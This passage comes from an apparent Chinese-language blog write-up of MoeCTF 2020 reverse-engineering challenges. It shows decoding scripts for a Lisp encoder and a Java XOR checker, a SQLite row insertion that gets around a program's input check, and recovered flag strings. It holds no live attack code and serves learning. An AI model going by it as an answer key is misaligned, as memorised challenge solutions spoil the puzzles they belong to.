"moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"))</span><br><span class="line"></span><br><span class="line">;;;; eof</span><br><span class="line">;;;; flag is "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>手动格式化一下:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">(defparameter +alphabet+"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs");</span><br><span class="line">(defparameter +len+(length +alphabet+))</span><br><span class="line">(</span><br><span class="line">defun divmod(number divisor)</span><br><span class="line">(</span><br><span class="line">values(floor(/ number divisor))(mod number divisor)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">(</span><br><span class="line">defun encode(str)</span><br><span class="line">(</span><br><span class="line">let</span><br><span class="line">(</span><br><span class="line">(value 0)</span><br><span class="line">(rstr(reverse str))</span><br><span class="line">(output(make-string-output-stream))</span><br><span class="line">(npad 0)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop for i from 0 to(1- (length str))</span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">setf value</span><br><span class="line">(</span><br><span class="line">+ value(*(char-code(elt rstr i))(expt 256 i))</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop while(>= value +len+)</span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">multiple-value-bind</span><br><span class="line">(new-value mod)</span><br><span class="line">(divmod value +len+)</span><br><span class="line">(setf value new-value)</span><br><span class="line">(write-char(elt +alphabet+ mod) output)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">write-char(elt +alphabet+ value)output</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop for char across str </span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">if(char-equal char #\Nul)</span><br><span class="line">(incf npad);npad++;</span><br><span class="line">(return)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(print npad)</span><br><span class="line">(</span><br><span class="line">concatenate 'string(coerce(loop for i from 1 to npad collecting #\1)'string)</span><br><span class="line">(</span><br><span class="line">reverse(get-output-stream-string output)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(print(encode "moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">;;;; eof</span><br><span class="line">;;;; flag is "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span><br></pre></td></tr></table></figure><p>虽然比题目好看一点,但还是很难看……</p><p>这个题的解题过程就是:学会clisp=>读懂题目=>敲成<code>python</code>=>写逆程序</p><p>转换成<code>python</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">alphabet = <span class="string">"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs"</span></span><br><span class="line">length = <span class="built_in">len</span>(alphabet)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">divmod</span>(<span class="params">a,b</span>):</span></span><br><span class="line"><span class="keyword">return</span> a//b,a%b</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reverse</span>(<span class="params">s</span>):</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span>.join(<span class="built_in">reversed</span>(s))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encode</span>(<span class="params"><span class="built_in">str</span></span>):</span></span><br><span class="line">ans=<span class="string">""</span></span><br><span class="line">value = <span class="number">0</span></span><br><span class="line">rstr = reverse(<span class="built_in">str</span>)</span><br><span class="line">napd = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(<span class="built_in">str</span>)):</span><br><span class="line">value = value + <span class="built_in">ord</span>(rstr[i])*(<span class="number">256</span>**i)</span><br><span class="line"><span class="keyword">while</span> value>=length:</span><br><span class="line">value, mod = <span class="built_in">divmod</span>(value, length)</span><br><span class="line">ans=ans+alphabet[mod]</span><br><span class="line">ans=ans+alphabet[value]</span><br><span class="line">ans=reverse(ans)</span><br><span class="line"><span class="keyword">return</span> ans</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print(encode(<span class="string">"moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#"&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>然后写一下解密脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">alphabet = <span class="string">"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs"</span></span><br><span class="line">ans = <span class="string">"&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reverse</span>(<span class="params">s</span>):</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span>.join(<span class="built_in">reversed</span>(s))</span><br><span class="line">ans = reverse(ans)</span><br><span class="line">value = alphabet.find(ans[<span class="built_in">len</span>(ans)-<span class="number">1</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">58</span>):</span><br><span class="line">value = <span class="built_in">len</span>(alphabet)*value + alphabet.find(ans[<span class="built_in">len</span>(ans)-<span class="number">2</span>-i])</span><br><span class="line">a = <span class="built_in">hex</span>(value)</span><br><span class="line">flag = <span class="built_in">str</span>(a)</span><br><span class="line">flag = flag[<span class="number">2</span>:<span class="built_in">len</span>(flag)-<span class="number">1</span>]</span><br><span class="line">print(flag.decode(<span class="string">'hex'</span>))</span><br><span class="line"><span class="comment"># moectf{woO0Oow_Y0u-ar3_th3_g0D_0f_LIIIISP!}</span></span><br></pre></td></tr></table></figure><p>对了,解密脚本是<code>python2</code>写的,因为在<code>python3</code>环境下会有<code>str</code>和<code>bytes</code>两种数据类型之间奇奇怪怪的错误……</p><h3 id="EzJava"><a href="#EzJava" class="headerlink" title="EzJava"></a>EzJava</h3><p>据名字猜考点:<code>java</code>逆向。</p><p>先找<code>java</code>逆向工具,这里我用的是<code>jd.gui</code>,把题目拖进去就可以看到<code>java</code>代码:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">EasyJava</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] paramArrayOfString)</span> </span>{</span><br><span class="line"> System.out.println(<span class="string">"MoeCTF 2020 EasyJava --by Reverier"</span>);</span><br><span class="line"> System.out.println(<span class="string">"Input your flag and I will check it:"</span>);</span><br><span class="line"> BufferedReader bufferedReader = <span class="keyword">new</span> BufferedReader(<span class="keyword">new</span> InputStreamReader(System.in));</span><br><span class="line"> String str = <span class="keyword">null</span>;</span><br><span class="line"> <span class="keyword">int</span>[] arrayOfInt = { </span><br><span class="line"> <span class="number">43</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">62</span>, <span class="number">110</span>, <span class="number">66</span>, <span class="number">94</span>, <span class="number">99</span>, <span class="number">126</span>, <span class="number">68</span>, </span><br><span class="line"> <span class="number">43</span>, <span class="number">62</span>, <span class="number">76</span>, <span class="number">110</span>, <span class="number">22</span>, <span class="number">5</span>, <span class="number">15</span>, <span class="number">111</span>, <span class="number">86</span>, <span class="number">75</span>, </span><br><span class="line"> <span class="number">78</span>, <span class="number">83</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">85</span>, <span class="number">86</span> };</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> str = bufferedReader.readLine();</span><br><span class="line"> } <span class="keyword">catch</span> (Exception exception) {</span><br><span class="line"> System.out.println(<span class="string">"ERROR: Undefined Exception."</span>);</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">if</span> (str.isEmpty()) {</span><br><span class="line"> System.out.println(<span class="string">"Nothing received."</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (str.length() != <span class="number">35</span>) { <span class="comment">//flag长度35</span></span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> String str1 = str.substring(<span class="number">0</span>, <span class="number">7</span>); </span><br><span class="line"> <span class="keyword">if</span> (!str1.equals(<span class="string">"moectf{"</span>)) {</span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> String str2 = str.substring(<span class="number">7</span>, str.length() - <span class="number">1</span>); <span class="comment">//把flag的头"moectf{"和最后面的"}"脱掉</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">//核心代码段</span></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">byte</span> b = <span class="number">0</span>; b < str2.length() - <span class="number">1</span>; b++) { </span><br><span class="line"> <span class="keyword">char</span> c1 = str2.charAt(b);</span><br><span class="line"> <span class="keyword">char</span> c2 = str2.charAt(b + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">int</span> i = c1 ^ c2;</span><br><span class="line"> <span class="keyword">if</span> (i != arrayOfInt[b]) {</span><br><span class="line"> System.out.println(<span class="string">"Rua~~~Wrong!"</span>);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> } </span><br><span class="line"> } </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> System.out.println(<span class="string">"Congratulations!"</span>);</span><br><span class="line"> } </span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>我们只需要仔细看核心代码段,又是异或……自反性,搞他!!!</p><p>因为<code>flag</code>一共35位,掐头去尾还剩27位,但是它内部数据只有26位,所以我们没有办法逆向搞并且<code>flag</code>是有意义字符串,所以这里还是选择正向暴力!!!</p><blockquote><p>暴力出奇迹,打表得省一</p></blockquote><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> b[<span class="number">50</span>]={<span class="number">43</span>,<span class="number">23</span>,<span class="number">23</span>,<span class="number">62</span>,<span class="number">110</span>,<span class="number">66</span>,<span class="number">94</span>,<span class="number">99</span>,<span class="number">126</span>,<span class="number">68</span>,<span class="number">43</span>,<span class="number">62</span>,<span class="number">76</span>,<span class="number">110</span>,<span class="number">22</span>,<span class="number">5</span>,<span class="number">15</span>,<span class="number">111</span>,<span class="number">86</span>,<span class="number">75</span>,<span class="number">78</span>,<span class="number">83</span>,<span class="number">86</span>,<span class="number">0</span>,<span class="number">85</span>,<span class="number">86</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> n=<span class="number">32</span>;n<=<span class="number">126</span>;n++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">char</span> rel[<span class="number">100</span>];</span><br><span class="line">rel[<span class="number">0</span>]=n;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">26</span>;i++)</span><br><span class="line"> rel[i+<span class="number">1</span>]=b[i]^rel[i];</span><br><span class="line"><span class="built_in">cout</span><<rel<<<span class="string">"\n"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Reverse/image-20201016201934908.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016201934908.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016201934908"></p><blockquote><p>moectf{Java_1s-N0t_a-CUP_0f-c0ff3e}</p></blockquote><h3 id="RollCall"><a href="#RollCall" class="headerlink" title="RollCall"></a>RollCall</h3><p>这个题比较特殊……</p><p><img src="/images/2020moectf-Reverse/image-20201016202556170.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016202556170.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016202556170"><img src="/images/2020moectf-Reverse/image-20201016202614496.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016202614496.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016202614496"></p><p>不管是题干还是<code>hint</code>都在暗示我们一件事情<strong>这程序不能逆向</strong>!!!我们看一下这个程序包里面有什么???</p><p><img src="/images/2020moectf-Reverse/image-20201016203039925.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016203039925.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016203039925"></p><p>嗯?<code>.sqlite</code>文件???这是一个数据库文件,那我们就可以猜到学生的各项数据他是存储在数据库里面,我们如果不能在程序添加性别为2,那我们可以直接对数据库操作。我是打开了<code>wsl</code>然后装一个 <code>sqlite</code>数据库,用<code>insert</code>命令向数据库里面插入一条性别为2的信息:</p><blockquote><p>sudo apt install sqlite3</p><p>sqlite3 UserData</p><p>.tables //查看该库下面的表,获取该库下表:students</p><p>PRAGMA table_info(students);//查看students表下所有字段:ID,name,sex,averange</p><p>INSERT INTO students VALUES (233, ‘BlackBird’, 2, 2 );</p></blockquote><p>然后再打开程序:<img src="/images/2020moectf-Reverse/image-20201017014608397.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201017014608397.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201017014608397"></p><h3 id="MidPython"><a href="#MidPython" class="headerlink" title="MidPython"></a>MidPython</h3><p>emmmm……<code>pyc</code>文件逆向先反编译,还是上面的那个<code>uncompyle6</code>,但是,报错了???我们打开“半生半熟”(一半py一半字节码)的<code>py</code>文件:(超长代码警告!!!)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span 